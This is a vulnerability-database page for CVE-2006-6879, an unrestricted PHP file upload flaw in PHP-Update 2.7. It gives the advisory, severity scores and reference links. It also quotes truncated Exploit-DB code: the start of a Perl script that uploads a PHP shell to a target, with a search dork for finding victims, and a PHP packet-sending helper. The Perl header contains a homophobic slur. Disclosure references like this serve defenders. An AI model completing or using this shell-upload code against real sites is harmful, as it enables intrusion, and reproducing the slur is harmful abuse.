CVE-2006-6879
published 2006-12-31CVE-2006-6879: Unrestricted file upload vulnerability in admin/uploads.php in PHP-Update 2.7 and earlier allows remote authenticated users to upload arbitrary PHP scripts to…
PriorityP334medium6CVSS 2.0
AVNACMAuSCPIPAP
EXPLOIT
EPSS
1.79%
75.6th percentile
Unrestricted file upload vulnerability in admin/uploads.php in PHP-Update 2.7 and earlier allows remote authenticated users to upload arbitrary PHP scripts to the gfx/ and files/ directories via the userfile parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php-update | php-update | <= 2.7 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP-Update 2.7 - '/admin/uploads.php' Remote Code Execution
exploitdb·2006-12-26
CVE-2006-6879 PHP-Update 2.7 - '/admin/uploads.php' Remote Code Execution
PHP-Update 2.7 - '/admin/uploads.php' Remote Code Execution
---
#!/usr/bin/perl
# rgod u fucking little piece of shit faggot. way to ruin a private exploit, scumbag
use strict;
use IO::Socket;
use MIME::Base64;
use Getopt::Std;
my $app = "PHP-Update 2.7";
my $type = "Remote Code Execution";
my $author = "undefined1_";
my $date = "2006-10-21";
my $settings = "none";
my $dork = "+\"powered by php update\"";
my %opt;
getopts("t:", \%opt);
$| = 1;
print ":: $app $type - by $author ::\n\n\n";
our $url = $opt{t} || usage();
our $file = randstring(12,16).".php";
if($url =~ m/^(?:http:\/\/)(.*)/) {
$url = $1;
}
if($url !~ m/^.*\/$/) {
$url .= "/";
}
get_shell($url);
sub get_shell {
my $url = shift;
print "uploading shell ... \t";
my $code = '';
my $boundary = "-----------------------
Exploit-DB
PHP-Update 2.7 - Multiple Vulnerabilities
exploitdb·2006-12-26
CVE-2006-6880 PHP-Update 2.7 - Multiple Vulnerabilities
PHP-Update 2.7 - Multiple Vulnerabilities
---
= 4.1
(allowing subs)
*/
if ($argc 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts
No writeups or analysis indexed.
http://secunia.com/advisories/23486http://www.securityfocus.com/bid/21789https://exchange.xforce.ibmcloud.com/vulnerabilities/31125https://www.exploit-db.com/exploits/3017https://www.exploit-db.com/exploits/3020http://secunia.com/advisories/23486http://www.securityfocus.com/bid/21789https://exchange.xforce.ibmcloud.com/vulnerabilities/31125https://www.exploit-db.com/exploits/3017https://www.exploit-db.com/exploits/3020
2006-12-31
Published